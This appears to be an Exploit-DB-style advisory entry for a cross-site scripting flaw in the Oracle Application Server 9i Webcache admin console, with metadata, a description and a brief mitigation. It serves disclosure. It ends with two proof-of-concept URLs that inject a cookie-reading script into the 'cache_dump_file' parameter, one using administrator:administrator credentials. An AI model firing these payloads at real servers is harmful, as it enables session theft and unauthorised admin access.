Oracle Application Server 9i Webcache Remote Cross-Site Scripting Vulnerability

vendor:

Application Server 9i

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Cross-Site Scripting

CWE

Product Name: Application Server 9i

Affected Version From: 9i

Affected Version To: 9i

Patch Exists: YES

Related CWE: N/A

CPE: oracle:application_server:9i

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2003

Oracle Application Server 9i Webcache Remote Cross-Site Scripting Vulnerability

A remote cross-site scripting vulnerability affects the Oracle Application Server 9i Webcache administration console. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. The issue affects the 'cache_dump_file' parameter of the 'webcacheadmin' script.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized prior to being included in dynamically generated Web content.

Source

Exploit-DB raw data:

source : https://www.securityfocus.com/bid/13421/info

A remote cross-site scripting vulnerability affects the Oracle Application Server 9i Webcache administration console. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.

The issue affects the 'cache_dump_file' parameter of the 'webcacheadmin' script. 

http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
http://administrator:administrator@example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>